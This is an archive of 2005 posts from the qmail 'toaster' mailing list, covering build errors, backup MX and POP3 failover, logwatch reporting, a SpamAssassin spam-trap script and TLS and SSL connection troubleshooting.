OS just to get courier-authlib working! However that's a rather essential component... Regards, David
Re: [toaster] courier-authlib gmake problem with FC4 on x86_64
Appologies - I didn't proof-read properly. ...appears to be a similar problem to _... should include a link to a message which I thought discussed a similar problem. Here it is: http://www.mail-archive.com/toaster@shupp.org/msg02976.html David Hi list, I'm encountering what appears to be a similar problem to _ when I get the the courier-imap stage of the toaster install. The following is a tail of the output of the gmake command run right after a successful ./configure --with-redhat (system is a 64-bit AMD system running FC4_x86_64): tail Linking libauthldap.la Compiling authmysql.c Compiling preauthmysql.c Compiling authmysqllib.c Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 /tail Looks like http://sourceforge.net/mailarchive/forum.php?thread_id=8106414forum_id=35252 is a similar error. I am using the most recent version of the toaster as of 28-12-2005 from shupp.org/toaster Can anybody suggest another way around this perhaps? I don't want to have to install a 32-bit OS just to get courier-authlib working! However that's a rather essential component... Regards, David !DSPAM:43b1926f53901391220585!
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
No it's 5.4.10... but this seems to be a problem with compiling courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 fix that? Thanks, David -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Wednesday, 28 December 2005 7:47 AM To: toaster@shupp.org Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 Does the toaster use vpopmail 5.4.13? That's where we added the -fPIC option when compiling libvpopmail. On Dec 27, 2005, at 11:18 AM, David Branford wrote: Appologies - I didn't proof-read properly. ...appears to be a similar problem to _... should include a link to a message which I thought discussed a similar problem. Here it is: http://www.mail-archive.com/toaster@shupp.org/msg02976.html David Hi list, I'm encountering what appears to be a similar problem to _ when I get the the courier-imap stage of the toaster install. The following is a tail of the output of the gmake command run right after a successful ./configure --with-redhat (system is a 64-bit AMD system running FC4_x86_64): tail Linking libauthldap.la Compiling authmysql.c Compiling preauthmysql.c Compiling authmysqllib.c Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 /tail Looks like http://sourceforge.net/mailarchive/forum.php? thread_id=8106414forum_id=35252 is a similar error. I am using the most recent version of the toaster as of 28-12-2005 from shupp.org/toaster Can anybody suggest another way around this perhaps? I don't want to have to install a 32-bit OS just to get courier-authlib working! However that's a rather essential component... Regards, David Tom Collins Tom Logic LLC PO Box 5717 Napa, CA 94581 (707) 265-6622 (707) 265-6646 fax [EMAIL PROTECTED] !DSPAM:43b1af6282309550112723!
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
Just thought I'd add that the previous version toaster compiled fine on FC3 on x86_64 (AMD Athlon 64). David -Original Message- From: David [mailto:[EMAIL PROTECTED] Sent: Wednesday, 28 December 2005 11:37 AM To: toaster@shupp.org Subject: RE: [toaster] courier-authlib gmake problem with FC4 on x86_64 No it's 5.4.10... but this seems to be a problem with compiling courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 fix that? Thanks, David -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Wednesday, 28 December 2005 7:47 AM To: toaster@shupp.org Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 Does the toaster use vpopmail 5.4.13? That's where we added the -fPIC option when compiling libvpopmail. On Dec 27, 2005, at 11:18 AM, David Branford wrote: Appologies - I didn't proof-read properly. ...appears to be a similar problem to _... should include a link to a message which I thought discussed a similar problem. Here it is: http://www.mail-archive.com/toaster@shupp.org/msg02976.html David Hi list, I'm encountering what appears to be a similar problem to _ when I get the the courier-imap stage of the toaster install. The following is a tail of the output of the gmake command run right after a successful ./configure --with-redhat (system is a 64-bit AMD system running FC4_x86_64): tail Linking libauthldap.la Compiling authmysql.c Compiling preauthmysql.c Compiling authmysqllib.c Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 /tail Looks like http://sourceforge.net/mailarchive/forum.php? thread_id=8106414forum_id=35252 is a similar error. I am using the most recent version of the toaster as of 28-12-2005 from shupp.org/toaster Can anybody suggest another way around this perhaps? I don't want to have to install a 32-bit OS just to get courier-authlib working! However that's a rather essential component... Regards, David Tom Collins Tom Logic LLC PO Box 5717 Napa, CA 94581 (707) 265-6622 (707) 265-6646 fax [EMAIL PROTECTED] !DSPAM:43b1e555133826854916318!
[toaster] Sorting mail
Hi all, The Shupp toaster is an extremely neat package, and I have been using it for over 12 months now on several boxes. I have found IMAP to be extremely useful to handle a large amount of e-mail, including archived messages, accross several MUA's including webmail (squirrelmail). But one feature I'm desperately lacking is the ability to sort mail into IMAP folders based on simple rules (eg. sender or subject). I don't need complex filtering, which various packages provide (eg. procmail) but I *do* need the ability to move mail into different folders based on filter settings. Knowing that I will have to integrate this with qmail courier as well, I thought I'd ask here first. Does anyone has anything going like this? Does anyone have any suggestions for what I should try? I have looked at procmail, sieve, and maildrop, but I haven't figured out any way of getting those programs to actually *move* my mail into different folders; they seem to be accept or reject only... Thanks regards, David.
RE: [toaster] Query about backup-mx's
-Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Thursday, 8 September 2005 12:46 AM To: toaster@shupp.org Subject: Re: [toaster] Query about backup-mx's On Sep 7, 2005, at 8:01 AM, David wrote: My question is: if mail.backup.dom receives e-mail intended test.com, how does it decide that the mail should go to mail.master.dom? ie. does the DNS data override all /control/locals entries (_and_ /control/virtualdomains)? or, will it be the case that even if mail.backup.dom is _not_ primary mx for test.com (as in my little example above), will it still check /control/rcpthosts and/or /control/virtualdomains and, if an entry is found in there for test.com, deliver it locally? What I am trying to investigate is the possibility of true backup mailserver takover; ie. something better than silently queing my mail on a backup mx when the primary is offline. But if the DNS data overrides /control/rcpthosts and /control/virtualdomains, then my quest is pointless... I'll never be able to make a simple configuration change on the fly and have my backup mx become my primary mx without modifying my DNS (which I want to avoid at all costs, as it takes so long for the changes to take effect as to be pointless). If the domain is only in rcpthosts, then your backup will queue it and continue trying to deliver to the primary server. If you have it in virtualdomains, then qmail should deliver it locally to that machine. Of course, you need to figure out how to keep mail and configuration information synchronized between the servers if you go that route. Thanks guys for the info. I guess that more specifically I have now narrowed my problem of failover accross an Internetwork link down to the pop3 server! Of all things... the effect of which, I imagine in production, would be something like: master mx goes down, that's fine; all mail is delivered to backup mx (locally), which has shared storage/rsync/etc. with master so it has all the mail on it. User goes to check mail (send/receive) and receives an error that the pop3 server cannot be found: there's no way to failover the address of the pop3 server (because that is entered in the MUA's mail settings). So I suppose that SMTP failover is more or less possible, now I'm stuck on the pop3 failover! Thanks again, David. -Tom !DSPAM:431f0433129511828715420!
RE: [toaster] Query about backup-mx's
-Original Message- From: rene marticke [mailto:[EMAIL PROTECTED] Sent: Friday, 9 September 2005 9:08 PM To: toaster@shupp.org Subject: Re: [toaster] Query about backup-mx's So I suppose that SMTP failover is more or less possible, now I'm stuck on the pop3 failover! Thanks again, David. If you have access to your nameserver you can edit the A record pop3.domain.tld and set a ttl of 60 seconds. If Masterpop faied just edit this entry and the lookup of pop3.domain.tld goes to your backup server. this is just an untested idea :-) I have thought about something similar... is this basically how dynamic dns works? ie. no special technology, just (real) short ttl's ? I guess this means the dns server has to be on a separate link too, but oh well, that's really how it _should_ be anyway... David. rene !DSPAM:4321742a62511538913330!
RE: [toaster] Query about backup-mx's
-Original Message- From: rene marticke [mailto:[EMAIL PROTECTED] Sent: Friday, 9 September 2005 9:19 PM To: toaster@shupp.org Subject: Re: [toaster] Query about backup-mx's I have thought about something similar... is this basically how dynamic dns works? ie. no special technology, just (real) short ttl's ? yes. this is what i do here for remoteaccess to customers not using public dyndns sites or such. I have my own dns with 60 seconds ttl. and the ip's are fetch from vpopmail last auth ;-) i use pdns with mysql backend. thanks - that's interesting. I might give the short ttl's a go. Should be easy enough for my situation - if the master's not available, update the dns. David regars rene !DSPAM:432176c265381222614394!
[toaster] Query about backup-mx's
I have a question regarding the backup-mx operation of the toaster: I have something like domain: test.com MX 5 mail.master.dom MX 10 mail.backup.dom in my DNS records. Say mail.master.dom goes down; the sending MTA automatically routes e-mail to mail.backup.dom. My question is: if mail.backup.dom receives e-mail intended test.com, how does it decide that the mail should go to mail.master.dom? ie. does the DNS data override all /control/locals entries (_and_ /control/virtualdomains)? or, will it be the case that even if mail.backup.dom is _not_ primary mx for test.com (as in my little example above), will it still check /control/rcpthosts and/or /control/virtualdomains and, if an entry is found in there for test.com, deliver it locally? What I am trying to investigate is the possibility of true backup mailserver takover; ie. something better than silently queing my mail on a backup mx when the primary is offline. But if the DNS data overrides /control/rcpthosts and /control/virtualdomains, then my quest is pointless... I'll never be able to make a simple configuration change on the fly and have my backup mx become my primary mx without modifying my DNS (which I want to avoid at all costs, as it takes so long for the changes to take effect as to be pointless). Many thanks for the toaster Bill contributors, and sorry for the off-topicness of this e-mail, David Branford Aternox Design www.aternoxdesign.com.au [EMAIL PROTECTED]
[toaster] gmake problems with redhat 9
Hi all, Just thought I'd post this to the list as an easy way to keep a reference to it. My system is redhat 9. When running gmake on the install of courier-imap on the latest version of the toaster at www.shupp.org/toaster, I was receiving the error: /usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory so I had to tell gmake where my redhat dist. had put them: make CPPFLAGS=-I/usr/kerberos/include ...worked fine. Regards, David Branford Aternox Design www.aternoxdesign.com.au [EMAIL PROTECTED]
RE: [toaster] gmake problems with redhat 9
Whoops, sorry - make CPPFLAGS=-I/usr/kerberos/include should of course be gmake CPPFLAGS=-I/usr/kerberos/include David Branford Aternox Design www.aternoxdesign.com.au [EMAIL PROTECTED] -Original Message- From: David [mailto:[EMAIL PROTECTED] Sent: Friday, 26 August 2005 9:46 PM To: Qmail Toaster Subject: [toaster] gmake problems with redhat 9 Hi all, Just thought I'd post this to the list as an easy way to keep a reference to it. My system is redhat 9. When running gmake on the install of courier-imap on the latest version of the toaster at www.shupp.org/toaster, I was receiving the error: /usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory so I had to tell gmake where my redhat dist. had put them: make CPPFLAGS=-I/usr/kerberos/include ...worked fine. Regards, David Branford Aternox Design www.aternoxdesign.com.au [EMAIL PROTECTED] !DSPAM:430f0809183122820515559!
[toaster] How to restart log services when they 'disappear'?
allow_null_glob_expansion=$x ;; status) status svscan RETVAL=$? x=$allow_null_glob_expansion allow_null_glob_expansion=1 for service in $SERVICESDIR/* do $BINDIR/svstat $service done allow_null_glob_expansion=$x ;; restart|reload) $0 stop $0 start RETVAL=$? ;; *) echo Usage: svscan {start|stop|restart|reload|status} exit 1 esac exit $RETVAL -- Sorry for the huge post; trying to be as clear/detailed as possible. Regards, David Branford Aternox Design www.aternoxdesign.com.au [EMAIL PROTECTED]
RE: [toaster] update to qmail-logwatch
-Original Message- From: Bob Hutchinson [mailto:[EMAIL PROTECTED] Sent: Wednesday, 17 August 2005 3:27 AM To: toaster@shupp.org Subject: Re: [toaster] update to qmail-logwatch On Wednesday 10 Aug 2005 08:31, David wrote: -Original Message- From: Bob Hutchinson [mailto:[EMAIL PROTECTED] Sent: Saturday, 6 August 2005 10:08 PM To: toaster@shupp.org Subject: [toaster] update to qmail-logwatch I have fixed a number of bugs, especially in the CHKUSER stuff in qmail-smtpd http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.7.tar.gz I was getting a lot of stuff like this in my logwatch reports: /etc/log.d/scripts/services/qmail-send: line 5: =: command not found /etc/log.d/scripts/services/qmail-send: line 6: =: command not found /etc/log.d/scripts/services/qmail-send: line 7: =: command not found /etc/log.d/scripts/services/qmail-send: line 8: =: command not found /etc/log.d/scripts/services/qmail-send: line 9: =: command not found /etc/log.d/scripts/services/qmail-send: line 10: =: command not found Running RedHat 9. So... I added this line: #!/usr/perl To the beginning of these files: /etc/log.d/scripts/services/qmail-pop3d /etc/log.d/scripts/services/qmail-pop3d3 /etc/log.d/scripts/services/qmail-send /etc/log.d/scripts/services/qmail-smtpd Sorry not to answer sooner, been away walking the hills. lol no worries - thanks for your answer! I'm using logwatch-6.1.2, perhaps yours is older. I have added a note to the README ah - perhaps time I changed to FC3... and now I get cool stuff like: Chkuser Accepts to (Threshold of 1): [EMAIL PROTECTED] - 54 Time(s) [EMAIL PROTECTED] - 19 Time(s) [EMAIL PROTECTED] - 5 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) Simscan Viruses (Threshold of 1): HTML.Phishing.Bank-1 - 1 Time(s) in my logs!! ...did I do the right thing ? looks about right, now tweak the thresholds in /etc/log.d/conf/services/qmail-smtpd.conf to reduce the size of the logwatch output. cool - I'll look at those; output's becoming rather a lot Thanks, David. HTH -- - Bob Hutchinson Midwales dot com - !DSPAM:430228f3113347681716748!
RE: [toaster] update to qmail-logwatch
Cool - thanks Bob! -Original Message- From: Bob Hutchinson [mailto:[EMAIL PROTECTED] Sent: Saturday, 6 August 2005 10:08 PM To: toaster@shupp.org Subject: [toaster] update to qmail-logwatch I have fixed a number of bugs, especially in the CHKUSER stuff in qmail-smtpd http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.7.tar.gz -- - Bob Hutchinson Midwales dot com - !DSPAM:42f4af47164761382817466!
RE: [toaster] update to qmail-logwatch
-Original Message- From: Bob Hutchinson [mailto:[EMAIL PROTECTED] Sent: Saturday, 6 August 2005 10:08 PM To: toaster@shupp.org Subject: [toaster] update to qmail-logwatch I have fixed a number of bugs, especially in the CHKUSER stuff in qmail-smtpd http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.7.tar.gz I was getting a lot of stuff like this in my logwatch reports: /etc/log.d/scripts/services/qmail-send: line 5: =: command not found /etc/log.d/scripts/services/qmail-send: line 6: =: command not found /etc/log.d/scripts/services/qmail-send: line 7: =: command not found /etc/log.d/scripts/services/qmail-send: line 8: =: command not found /etc/log.d/scripts/services/qmail-send: line 9: =: command not found /etc/log.d/scripts/services/qmail-send: line 10: =: command not found Running RedHat 9. So... I added this line: #!/usr/perl To the beginning of these files: /etc/log.d/scripts/services/qmail-pop3d /etc/log.d/scripts/services/qmail-pop3d3 /etc/log.d/scripts/services/qmail-send /etc/log.d/scripts/services/qmail-smtpd and now I get cool stuff like: Chkuser Accepts to (Threshold of 1): [EMAIL PROTECTED] - 54 Time(s) [EMAIL PROTECTED] - 19 Time(s) [EMAIL PROTECTED] - 5 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) [EMAIL PROTECTED] - 1 Time(s) Simscan Viruses (Threshold of 1): HTML.Phishing.Bank-1 - 1 Time(s) in my logs!! ...did I do the right thing ? David. -- - Bob Hutchinson Midwales dot com - !DSPAM:42f4af47164761382817466!
[toaster] Weird problem...
Hi all, First of all sorry this is a little off topic and may not be entirely qmail-related, but I am stuck with this one and wondered if anyone else on here has had the same experience. I have the latest version of Bill's toaster installed on a redhat 9 box, which also happens to be my internet gateway. Today, I find that I am unable to send/receive e-mail using the DNS name of the qmail server (mail.mydomain.net) from the LAN attached to my gateway. I have checked the obvious; address resolves fine, internet access is fine, run a test without any firewall rules. The weird thing is that I can send/receive mail fine if I put in the internal IP address of the gateway. I know this is the type of question that comes up a hundred times from 'new users', and the answer is always an obvious one (one thing I like about Linux as opposed to Window$ is that there's always a _reason_ for something not working that I can _find_ and _fix_) but I just can't figure out what it is in this case. It's getting rather desperate since my users are one by one beginning to experience this difficulty. Thanks for you posts, David.
RE: [toaster] Weird problem... *solved*
OK I solved my own thread :) Sorry for the noise... there are sooo many ways/distro scripts (so it seems to me anyway) to do the same thing. I had a different default gateway specified in /etc/sysconfig/network than in /etc/sysconfig/network-scripts/ files. Don't know how it messed me up in this particular instance, but my toaster is working again :) David. -Original Message- From: David [mailto:[EMAIL PROTECTED] Sent: Wednesday, 10 August 2005 11:37 AM To: Qmail Toaster Subject: [toaster] Weird problem... Hi all, First of all sorry this is a little off topic and may not be entirely qmail-related, but I am stuck with this one and wondered if anyone else on here has had the same experience. I have the latest version of Bill's toaster installed on a redhat 9 box, which also happens to be my internet gateway. Today, I find that I am unable to send/receive e-mail using the DNS name of the qmail server (mail.mydomain.net) from the LAN attached to my gateway. I have checked the obvious; address resolves fine, internet access is fine, run a test without any firewall rules. The weird thing is that I can send/receive mail fine if I put in the internal IP address of the gateway. I know this is the type of question that comes up a hundred times from 'new users', and the answer is always an obvious one (one thing I like about Linux as opposed to Window$ is that there's always a _reason_ for something not working that I can _find_ and _fix_) but I just can't figure out what it is in this case. It's getting rather desperate since my users are one by one beginning to experience this difficulty. Thanks for you posts, David. !DSPAM:42f96147216241747669939!
RE: [toaster] Toaster 0.8 up
That's fantastic news Bill! The new look is interesting too - looks familiar somehow... :) I particularly appreciate the addition of well-worked-out qmailmrtg instructions. I have been using qmailmrtg for about 6 months or so now, and am wrapped with all the information it gives (and it looks pretty too!). What I would really like to see, and something which I am experimenting with at the moment, is the mrtg part replaced with the newer rrdtool. I have found some info. on doing that here: http://www.wheely-bin.co.uk/pages/28/ If anyone else is interested. Thanks again, and keep the updates coming! We appreciate it! David. -Original Message- From: Bill Shupp [mailto:[EMAIL PROTECTED] Sent: Tuesday, 26 July 2005 11:40 AM To: toaster@shupp.org Subject: [toaster] Toaster 0.8 up All, I have updated the toaster document to version 0.8. All software packages are upgraded where relevant, as is the qmail-toaster patch version. There are a few new things, including qmailmrtg7 instructions, new Debian notes, and the ability to change the source paths to something other than /var/src. And check out the new look! There's also an RSS feed for shupp.org at feed://www.shupp.org/index.rss. Please help test it out if you get a chance, and send any comments to this list. Cheers, Bill Shupp !DSPAM:42e59b7a57051151916275!
RE: [toaster] logwatch-qmail
Most handy! I have been wanting something like this for my redhat setups for some time; will give it a try! David. -Original Message- From: Bob Hutchinson [mailto:[EMAIL PROTECTED] Sent: Monday, 20 June 2005 9:04 PM To: toaster@shupp.org Subject: [toaster] logwatch-qmail For those of you interested in parsing qmail multilog files in logwatch, I have added simscan and CHKUSER filters to qmail-smtpd http://midwales.com/hutch/downloads/logwatch/logwatch-qmail-1.0.6.tar.gz Feedback welcome of course ;-) -- - Bob Hutchinson Midwales dot com - !DSPAM:42b6a9d254777047185227!
RE: [toaster] Possible relay?
-Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Thursday, 9 June 2005 1:04 AM To: toaster@shupp.org Subject: Re: [toaster] Possible relay? On Jun 7, 2005, at 11:25 PM, David wrote: 2005-06-08 15:33:07.619543500 info msg 8225097: bytes 2214 from qp 28395 uid 89 2005-06-08 15:33:07.639654500 starting delivery 7816: msg 8225097 to remote [EMAIL PROTECTED] 2005-06-08 15:33:07.639657500 status: local 0/10 remote 1/20 2005-06-08 15:33:13.133576500 delivery 7816: failure: Connected_to_[a_remote_ip]_but_sender_was_rejected./Remote_host_said: _501_#2 175005_Syntax_error_in_parameters_or_arguments/ It's probably a bounce here's a command to look at the message contents, replace 8225097 with whatever message number from your logs that you want to view: more `find /var/qmail/queue/mess -name 8225097` Keep in mind, that after a message is delivered the message number can be re-used by another message. IIRC, the number is actually the inode number of one of the files related to the message. Thanks guys, yes the message file was already gone off disk. I will check it the next time I see one of these types of messages and report back. Thanks again, David. -- Tom Collins - [EMAIL PROTECTED] QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ You don't need a laptop to troubleshoot high-speed Internet: sniffter.com !DSPAM:42a7101754162076342821!
[toaster] Possible relay?
Hi list, I have been running the Shupp Toaster for some time. My current version is 0.7.10, running on redhat 9. I have been receiving a few entries in my qmail log which appear a little dubious to me. They look like the following example, taken from today: # tail /var/log/qmail/current | tai64nlocal [snip] 2005-06-08 15:33:07.619543500 info msg 8225097: bytes 2214 from qp 28395 uid 89 2005-06-08 15:33:07.639654500 starting delivery 7816: msg 8225097 to remote [EMAIL PROTECTED] 2005-06-08 15:33:07.639657500 status: local 0/10 remote 1/20 2005-06-08 15:33:13.133576500 delivery 7816: failure: Connected_to_[a_remote_ip]_but_sender_was_rejected./Remote_host_said:_501_#2 175005_Syntax_error_in_parameters_or_arguments/ [/snip] The only substitutions I to the above were: - substituted domain of hill.h@ email address for [domain] - substituted the remote ip address for [a_remote_ip] both to protect the innocent... My concern is that to me, this log reads as though some outside party attempted to send a mal-formed message without a return address field through our mailserver, and succeeded. It appears that it was up to the destination mailserver to drop the message (for some reason)... if this is true, then wouldn't this mean unwanted parties can relay through our server by doing whatever was done here? It looks like the relay succeeded, but the remote server simply didn't like the message... if something shows up in their logs, they will have record that the message came through my server no? Any advice would be much appreciated, as this has me a little worried... David.
Re: [toaster] maildrop spamtrap
On Wed, 2005-04-13 at 11:52 -0700, joe wrote: Does anyone have a maildrop script for a spamtrap. I want to have email sent to a old email address automatically learned as spam. Does anyone have one that they want to share? Thank you, --Joe Young -- I found this script time ago, for any maildrop learner: http://mymail.alien77.com/maildropMEGAEXAMPLE You can redirect mail as follows if(/[EMAIL PROTECTED]/:h) { cc /domains/blah.com/spamhole/Maildir exit } Then do whatever using a cron job script. But if all you want is tag as spam any email arriving to a certain account that's what I use, small bash script: cat spamtrap #!/bin/bash DIR='/domains/blah.com/spamhole/Maildir/cur' X=`(cd $DIR ; echo *)` if [ $X != * ] ; then cd /domains/blah.com/spamhole/Maildir/cur su vpopmail -c 'sa-learn --spam ./' ls . | xargs -i mv ./{} ../.already/cur/ fi HTH David [EMAIL PROTECTED]
Re: [toaster] qmail maillog
- Original Message - From: List [EMAIL PROTECTED] To: toaster@shupp.org Sent: Monday, April 04, 2005 4:20 PM Subject: Re: [toaster] qmail maillog List wrote: Hi List, I had install a fresh toaster and everything is running fine except that the incoming connections are not logged into /var/log/maillog. How can i make the connections log into the maillog file? I am running the lastest toaster with FC3. You need to use splogger instead of multilog if you want to log to syslog. See the qmail docs for how to set that up. This toaster uses multilog. Hi, Another question. How can I log vpopmail connections into /var/log/maillog? I have a RH9 running toaster 0.61 and have a log like Apr 4 14:56:17 advanced vpopmail[16375]: vchkpw-pop3: (PLAIN) login success [EMAIL PROTECTED]:220.225.58.53 I believe the latest version of the toaster does that. From a Shupp 0.7.9 toaster - /var/log/maillog: Apr 4 16:33:45 ns vpopmail[20286]: vchkpw-pop3: (PLAIN) login success [EMAIL PROTECTED]:192.168.1.102 Apr 4 16:33:45 ns vpopmail[20288]: vchkpw-pop3: (PLAIN) login success [EMAIL PROTECTED]:192.168.1.102 etc. David. regards !DSPAM:4250e3b8111719412120352!
[toaster] TLS connect failed
There are a couple of things to check here. * Look in /var/log/qmail/qmail-send/current - are you seeing permissions errors for clientcert.pem and /or servercert.pem? * Make sure you have servercert.pem and clientcert.pem in /var/qmail/control, and that they are readable by the user that is running qmail. The simplest thing to do is to chown the files so that the qmail group is the owner - this way you're sure that all the qmail users can read it. * If this is happening with only ONE host on the intenet - like, it always fails to domain.com - there's a chance that the remote server is not configured correctly for TLS, but is saying that it is. You can test this like this: slimy:~ telnet mx1.domain.com 25 Trying 216.251.32.71... Connected to mx1.domain.com. Escape character is '^]'. 220 mail107.domain.com ESMTP Sendmail 8.13.1/8.13.1; Thu, 31 Mar 2005 12:01:12 -0500 ehlo domain.com 250-mail107.domain.com Hello slimy.dreamhost.com [205.196.208.18], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-8BITMIME 250-SIZE 52428800 250-DSN 250-AUTH PLAIN LOGIN 250-STARTTLS 250-DELIVERBY 250 HELP starttls 220 2.0.0 Ready to start TLS If you cant execute the STARTTLS command, somehting could be wrong on the remote server. Good luck, david -Original Message- From: Ingo Claro [mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, April 04, 2005 11:41 AM To: toaster@shupp.org Subject: [toaster] TLS connect failed Hello all, i've encountered the following bounce from my server: [EMAIL PROTECTED]: TLS connect failed; connected to xxx.xxx.xxx.xxx. I'm not going to try again; this message has been in the queue too long. anyone knows why it happens? regards, Ingo application/ms-tnef
RE: [toaster] TLS connect failed
Cool. Quite likely, the firewall between that server the internet is not configured to allow TLS thru. Cheers, david -Original Message- From: Ingo Claro [mailto:[EMAIL PROTECTED] Sent: Monday, April 04, 2005 12:34 PM To: toaster@shupp.org Subject: RE: [toaster] TLS connect failed David: that was it! i get the following: 250-TLS 250-HELP 250-STARTTLS 250-DSN 250-SIZE 2048 250-8BITMIME 250 PIPELINING starttls 220 Ready to start TLS Connection closed by foreign host. the server closed the connection inmediatly after doing the starttls. So it's a problem in the other server. regards, Ingo _ De: Pollack, David [mailto:[EMAIL PROTECTED] Enviado el: Lunes, 04 de Abril de 2005 13:05 Para: 'toaster@shupp.org' Asunto: [toaster] TLS connect failed There are a couple of things to check here. * Look in /var/log/qmail/qmail-send/current - are you seeing permissions errors for clientcert.pem and /or servercert.pem? * Make sure you have servercert.pem and clientcert.pem in /var/qmail/control, and that they are readable by the user that is running qmail. The simplest thing to do is to chown the files so that the qmail group is the owner - this way you're sure that all the qmail users can read it. * If this is happening with only ONE host on the intenet - like, it always fails to domain.com - there's a chance that the remote server is not configured correctly for TLS, but is saying that it is. You can test this like this: slimy:~ telnet mx1.domain.com 25 Trying 216.251.32.71... Connected to mx1.domain.com. Escape character is '^]'. 220 mail107.domain.com ESMTP Sendmail 8.13.1/8.13.1; Thu, 31 Mar 2005 12:01:12 -0500 ehlo domain.com 250-mail107.domain.com Hello slimy.dreamhost.com [205.196.208.18], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-8BITMIME 250-SIZE 52428800 250-DSN 250-AUTH PLAIN LOGIN 250-STARTTLS 250-DELIVERBY 250 HELP starttls 220 2.0.0 Ready to start TLS If you cant execute the STARTTLS command, somehting could be wrong on the remote server. Good luck, david -Original Message- From: Ingo Claro [mailto:[EMAIL PROTECTED] Sent: Monday, April 04, 2005 11:41 AM To: toaster@shupp.org Subject: [toaster] TLS connect failed Hello all, i've encountered the following bounce from my server: [EMAIL PROTECTED]: TLS connect failed; connected to xxx.xxx.xxx.xxx. I'm not going to try again; this message has been in the queue too long. anyone knows why it happens? regards, Ingo
Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start...
Thanks Bill for the reply; - Original Message - From: Bill Shupp [EMAIL PROTECTED] To: toaster@shupp.org Sent: Sunday, March 27, 2005 9:00 AM Subject: Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start... David wrote: Hi all, Have made several Shupp toaster installs now, but this most recent one has stumped me. It's on fedora core 3, (x86_64) and I made sure there were no running smtp/pop3/pop3s services before I began: but neither qmail-smtpd, pop3d or pop3ds will start, using qmailctl script. In each of those daemons' logs, there is: tcpserver: fatal: temporarily unable to figure out IP address for 0.0.0.0: file does not exist Has anyone seen this before? I can't work out why tcpserver is being passed a hostname or IP address of 0.0.0.0 The latest toasters are built on netqmail, which has the 0.0.0.0 patch. Did you use the last toaster patch? Oh... I used the latest version of the toaster (.7.9) with all downloads from there - netqmail 1.05. Could this be a x86_64 specific problem? David. Regards, Bill !DSPAM:4245f0b830071352512884!
[toaster] SMTP over SSL
Hi all, I have not managed to get SMTP working over SSL with one of Bill's toasters. Is this feature supported ? I am using one of Bill's toasters installed on a RH9 box, everything else works fine. Toaster version 0.7.7. I use Outlook Express as my mail client, and tested it as follows: - I tried sending messages over standard SMTP (port 25), authenticating on the SMTP server with my username (e-mail address) and password - I tried enabling SSL for the SMTP server, and changing the port to 465, and still authenticating on the SMTP server in the same way as before and I just get the the connection to the server has failed, socket error, using SSL message. - I tried the same thing again but with port set to 25, same result. If SSL is not available for SMTP, that is my answer! otherwise... does anybody have any clues ? Any more information I need to provide? Thanks, David.
Re: [toaster] SMTP over SSL
